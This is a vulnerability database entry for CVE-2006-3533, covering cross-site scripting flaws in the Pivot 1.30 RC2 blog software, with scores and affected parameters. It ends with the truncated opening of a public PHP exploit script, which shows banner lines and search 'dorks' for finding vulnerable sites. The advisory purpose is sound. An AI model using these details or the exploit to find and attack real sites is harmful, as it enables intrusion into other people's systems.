5.8
CVSSv2

CVE-2006-3533

Published: 12/07/2006 Updated: 18/10/2018
CVSS v2 Base Score: 5.8 | Impact Score: 4.9 | Exploitability Score: 8.6
VMScore: 585
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:N

Vulnerability Summary

Multiple cross-site scripting (XSS) vulnerabilities in Pivot 1.30 RC2 and previous versions, when register_globals is enabled, allow remote malicious users to inject arbitrary web script or HTML via the (1) fg, (2) line1, (3) line2, (4) bg, (5) c1, (6) c2, (7) c3, and (8) c4 parameters in (a) includes/blogroll.php; (9) name and (10) js_name parameters in (b) includes/editor/edit_menu.php; and, even if register_globals is not enabled, the (11) h and (12) w parameters in (c) includes/photo.php.

Vulnerable Product Search on Vulmon Subscribe to Product

pivot pivot 1.30_rc2

Exploits

#!/usr/bin/php -q -d short_open_tag=on <? echo "Pivot <= 130 RC2 privileges escalation / remote commands execution exploit\n"; echo "by rgod rgod@autisticiorg\n"; echo "site: retrogodaltervistaorg\n"; echo "dorks: \"Powered byPivot\"\n"; echo "version specific: \"Powered byPivot - 130 RC2\" +Rippersnapper\n\n"; /* works with regis ...